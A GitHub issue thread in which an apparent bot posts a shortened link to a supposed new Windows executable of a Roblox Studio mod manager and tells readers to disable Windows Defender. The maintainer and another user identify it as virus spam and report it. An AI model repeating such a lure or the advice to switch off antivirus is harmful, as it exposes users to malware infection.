### ISSUE TITLE
New windows version

### ISSUE THREAD

**Issue by jonathonIT** [MaximumADHD/Roblox-Studio-Mod-Manager#171]
I uploaded a new exe version here: (You need to disable Windows Defender to work)
shorturl.at/JUX57

**Comment by MaximumADHD** [comment]
No, this is not the correct avenue to do this.
You need to elaborate on what you’re doing here and why.

**Comment by Pseudoreality** [comment]
It's a bot that's uploading viruses on a bunch of different repositories, lol.

**Comment by MaximumADHD** [comment]
Yeah I noticed. Already reported them.
